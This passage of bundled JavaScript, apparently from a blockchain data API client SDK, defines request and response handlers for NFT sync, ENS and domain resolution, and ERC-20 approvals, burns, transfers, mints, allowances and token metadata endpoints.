            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).checksum;
        }),
        cursor: request.cursor,
        limit: request.limit,
        disableTotal: request.disableTotal
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$n(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        format: jsonRequest.format,
        q: jsonRequest.q,
        filter: jsonRequest.filter,
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        fromDate: jsonRequest.fromDate,
        toDate: jsonRequest.toDate,
        addresses: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonRequest.addresses, function(addresses) {
            return addresses.map(function(address) {
                return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
            });
        }),
        cursor: jsonRequest.cursor,
        limit: jsonRequest.limit,
        disableTotal: jsonRequest.disableTotal
    };
}
/** Initiates a sync of a previously non synced Contract. */ var $3dfc2d9370ba0cd1$export$e620f1cc2d1a3557 = {
    method: "PUT",
    name: "syncNFTContract",
    id: "syncNFTContract",
    groupName: "nft",
    urlPathPattern: "/nft/{address}/sync",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$m,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$m,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$m,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$m
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$m(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$m() {
    return {
        success: true
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$m(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$m(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address)
    };
}
/** Resolve an ETH address and find the ENS name. */ var $3dfc2d9370ba0cd1$export$f51a3715ba5a6e0c = {
    method: "GET",
    name: "resolveAddress",
    id: "resolveAddress",
    groupName: "resolve",
    isNullable: true,
    urlPathPattern: "/resolve/{address}/reverse",
    urlPathParamNames: [
        "address"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$l,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$l,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$l,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$l
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$l(request) {
    return {
        address: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.address, function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).checksum;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$l(jsonResponse) {
    return jsonResponse;
}
function $3dfc2d9370ba0cd1$var$serializeRequest$l(request) {
    return {
        address: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.address, function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).checksum;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$l(jsonRequest) {
    return {
        address: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(jsonRequest.address, function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        })
    };
}
/** Resolve an Unstoppable domain and get the address. */ var $3dfc2d9370ba0cd1$export$42c99d178d9486c8 = {
    method: "GET",
    name: "resolveDomain",
    id: "resolveDomain",
    groupName: "resolve",
    isNullable: true,
    urlPathPattern: "/resolve/{domain}",
    urlPathParamNames: [
        "domain"
    ],
    urlSearchParamNames: [
        "currency"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$k,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$k,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$k,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$k
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$k(request) {
    return {
        currency: request.currency,
        domain: request.domain
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$k(request) {
    return {
        currency: request.currency,
        domain: request.domain
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$k(jsonRequest) {
    return {
        currency: jsonRequest.currency,
        domain: jsonRequest.domain
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$k(jsonResponse) {
    return {
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonResponse.address)
    };
}
/** Resolve a specific ENS domain to its address. */ var $3dfc2d9370ba0cd1$export$7af7fa88f6da397b = {
    method: "GET",
    name: "resolveENSDomain",
    id: "resolveENSDomain",
    groupName: "resolve",
    isNullable: true,
    urlPathPattern: "/resolve/ens/{domain}",
    urlPathParamNames: [
        "domain"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$j,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$j,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$j,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$j
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$j(request) {
    return {
        domain: request.domain
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$j(request) {
    return {
        domain: request.domain
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$j(jsonRequest) {
    return {
        domain: jsonRequest.domain
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$j(jsonResponse) {
    return {
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonResponse.address)
    };
}
/** Get the amount which the spender is allowed to withdraw on behalf of the owner. */ var $3dfc2d9370ba0cd1$export$f8b05e1b1d8e8d98 = {
    method: "GET",
    name: "getErc20Approvals",
    id: "getErc20Approvals",
    groupName: "token",
    urlPathPattern: "/erc20/approvals",
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "limit",
        "cursor",
        "contractAddresses",
        "excludeContracts",
        "walletAddresses",
        "excludeWallets"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$i,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$i,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$i,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$i
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$i(request, core) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        contract_addresses: (_a = request.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        exclude_contracts: (_b = request.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        wallet_addresses: (_c = request.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        exclude_wallets: (_d = request.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$i(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(approval) {
        return $3dfc2d9370ba0cd1$export$bf30cc2feafa6bb3.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(approval)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            tokenDecimals: Number(approval.token_decimals)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$i(request, core) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        limit: request.limit,
        cursor: request.cursor,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        contractAddresses: (_a = request.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        excludeContracts: (_b = request.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        walletAddresses: (_c = request.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        excludeWallets: (_d = request.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$i(jsonRequest) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        contractAddresses: (_a = jsonRequest.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        excludeContracts: (_b = jsonRequest.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        walletAddresses: (_c = jsonRequest.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        excludeWallets: (_d = jsonRequest.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        })
    };
}
/** Get the amount which the spender is allowed to withdraw on behalf of the owner. */ var $3dfc2d9370ba0cd1$export$9affd740a9b8ad81 = {
    method: "GET",
    name: "getErc20Burns",
    id: "getErc20Burns",
    groupName: "token",
    urlPathPattern: "/erc20/burns",
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "limit",
        "cursor",
        "contractAddresses",
        "excludeContracts",
        "walletAddresses",
        "excludeWallets"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$h,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$h,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$h,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$h
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$h(request, core) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        contract_addresses: (_a = request.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        exclude_contracts: (_b = request.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        wallet_addresses: (_c = request.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        exclude_wallets: (_d = request.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$h(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(burn) {
        return $3dfc2d9370ba0cd1$export$ef21c6c8b687afec.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(burn)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            tokenDecimals: Number(burn.token_decimals)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$h(request, core) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        limit: request.limit,
        cursor: request.cursor,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        contractAddresses: (_a = request.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        excludeContracts: (_b = request.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        walletAddresses: (_c = request.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        excludeWallets: (_d = request.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$h(jsonRequest) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        contractAddresses: (_a = jsonRequest.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        excludeContracts: (_b = jsonRequest.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        walletAddresses: (_c = jsonRequest.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        excludeWallets: (_d = jsonRequest.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        })
    };
}
/** Get the amount which the spender is allowed to withdraw on behalf of the owner. */ var $3dfc2d9370ba0cd1$export$11d16d0532d3e4f8 = {
    method: "GET",
    name: "getErc20Transfers",
    id: "getErc20Transfers",
    groupName: "token",
    urlPathPattern: "/erc20/transfers",
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "limit",
        "cursor",
        "contractAddresses",
        "excludeContracts",
        "walletAddresses",
        "excludeWallets"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$g,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$g,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$g,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$g
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$g(request, core) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        contract_addresses: (_a = request.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        exclude_contracts: (_b = request.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        wallet_addresses: (_c = request.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        exclude_wallets: (_d = request.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$g(jsonResponse) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(transfer) {
        return $3dfc2d9370ba0cd1$export$3c03bf5de5113cba.fromJSON(transfer);
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$g(request, core) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        limit: request.limit,
        cursor: request.cursor,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        contractAddresses: (_a = request.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        excludeContracts: (_b = request.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        walletAddresses: (_c = request.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        excludeWallets: (_d = request.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$g(jsonRequest) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        contractAddresses: (_a = jsonRequest.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        excludeContracts: (_b = jsonRequest.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        walletAddresses: (_c = jsonRequest.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        excludeWallets: (_d = jsonRequest.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        })
    };
}
/** Get the amount which the spender is allowed to withdraw on behalf of the owner. */ var $3dfc2d9370ba0cd1$export$63cbd81d3736e8e1 = {
    method: "GET",
    name: "getErc20Mints",
    id: "getErc20Mints",
    groupName: "token",
    urlPathPattern: "/erc20/mints",
    urlSearchParamNames: [
        "chain",
        "fromBlock",
        "toBlock",
        "limit",
        "cursor",
        "contractAddresses",
        "excludeContracts",
        "walletAddresses",
        "excludeWallets"
    ],
    firstPageIndex: 0,
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$f,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$f,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$f,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$f
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$f(request, core) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        from_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.fromBlock, String),
        to_block: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.toBlock, String),
        limit: (0, $10891f2cb3e98601$export$f8b8b9ce72e9ccbf)(request.limit, String),
        cursor: request.cursor,
        contract_addresses: (_a = request.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        exclude_contracts: (_b = request.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        wallet_addresses: (_c = request.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        exclude_wallets: (_d = request.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$f(jsonResponse, request, core) {
    var _a;
    return ((_a = jsonResponse.result) !== null && _a !== void 0 ? _a : []).map(function(mint) {
        return $3dfc2d9370ba0cd1$export$e659ed95207d1806.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(mint)), {
            chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core),
            tokenDecimals: Number(mint.token_decimals)
        }));
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$f(request, core) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        limit: request.limit,
        cursor: request.cursor,
        fromBlock: request.fromBlock,
        toBlock: request.toBlock,
        contractAddresses: (_a = request.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        excludeContracts: (_b = request.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        walletAddresses: (_c = request.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        }),
        excludeWallets: (_d = request.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address).lowercase;
        })
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$f(jsonRequest) {
    var _a, _b, _c, _d;
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        limit: jsonRequest.limit,
        cursor: jsonRequest.cursor,
        fromBlock: jsonRequest.fromBlock,
        toBlock: jsonRequest.toBlock,
        contractAddresses: (_a = jsonRequest.contractAddresses) === null || _a === void 0 ? void 0 : _a.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        excludeContracts: (_b = jsonRequest.excludeContracts) === null || _b === void 0 ? void 0 : _b.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        walletAddresses: (_c = jsonRequest.walletAddresses) === null || _c === void 0 ? void 0 : _c.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        }),
        excludeWallets: (_d = jsonRequest.excludeWallets) === null || _d === void 0 ? void 0 : _d.map(function(address) {
            return $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(address);
        })
    };
}
/** Get the amount which the spender is allowed to withdraw on behalf of the owner. */ var $3dfc2d9370ba0cd1$export$35c74b1c5e54b671 = {
    method: "GET",
    name: "getTokenAllowance",
    id: "getTokenAllowance",
    groupName: "token",
    urlPathPattern: "/erc20/{address}/allowance",
    urlPathParamNames: [
        "address"
    ],
    urlSearchParamNames: [
        "chain",
        "ownerAddress",
        "spenderAddress"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$e,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$e,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$e,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$e
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$e(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        owner_address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.ownerAddress).lowercase,
        spender_address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.spenderAddress).lowercase,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).lowercase
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$e(jsonResponse) {
    return {
        allowance: (0, $10891f2cb3e98601$export$d97aa349ed20696).create(jsonResponse.allowance)
    };
}
function $3dfc2d9370ba0cd1$var$serializeRequest$e(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        ownerAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.ownerAddress).checksum,
        spenderAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.spenderAddress).checksum,
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(request.address).checksum
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$e(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        ownerAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.ownerAddress),
        spenderAddress: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.spenderAddress),
        address: $3dfc2d9370ba0cd1$export$762b85ce1c60fa11.create(jsonRequest.address)
    };
}
/** Get metadata for a list of token symbols (name, symbol, decimals, logo). */ var $3dfc2d9370ba0cd1$export$30dee9f56bd044aa = {
    method: "GET",
    name: "getTokenMetadataBySymbol",
    id: "getTokenMetadataBySymbol",
    groupName: "token",
    urlPathPattern: "/erc20/metadata/symbols",
    urlSearchParamNames: [
        "chain",
        "symbols"
    ],
    getRequestUrlParams: $3dfc2d9370ba0cd1$var$getRequestUrlParams$d,
    serializeRequest: $3dfc2d9370ba0cd1$var$serializeRequest$d,
    deserializeRequest: $3dfc2d9370ba0cd1$var$deserializeRequest$d,
    deserializeResponse: $3dfc2d9370ba0cd1$var$deserializeResponse$d
};
// Methods
function $3dfc2d9370ba0cd1$var$getRequestUrlParams$d(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        symbols: request.symbols
    };
}
function $3dfc2d9370ba0cd1$var$deserializeResponse$d(jsonResponse, request, core) {
    return (jsonResponse !== null && jsonResponse !== void 0 ? jsonResponse : []).map(function(token) {
        return {
            token: $3dfc2d9370ba0cd1$export$28ff99e69b404cc.create($3dfc2d9370ba0cd1$var$__assign($3dfc2d9370ba0cd1$var$__assign({}, (0, $10891f2cb3e98601$export$86f54f62aa7a7514)(token)), {
                contractAddress: token.address,
                chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core)
            })),
            blockNumber: token.block_number,
            validated: token.validated
        };
    });
}
function $3dfc2d9370ba0cd1$var$serializeRequest$d(request, core) {
    return {
        chain: $3dfc2d9370ba0cd1$export$f9c4238e05371bd3.resolve(request.chain, core).apiHex,
        symbols: request.symbols
    };
}
function $3dfc2d9370ba0cd1$var$deserializeRequest$d(jsonRequest) {
    return {
        chain: $3dfc2d9370ba0cd1$export$dec4acc6cabdbcd7.create(jsonRequest.chain),
        symbols: jsonRequest.symbols
    };
}
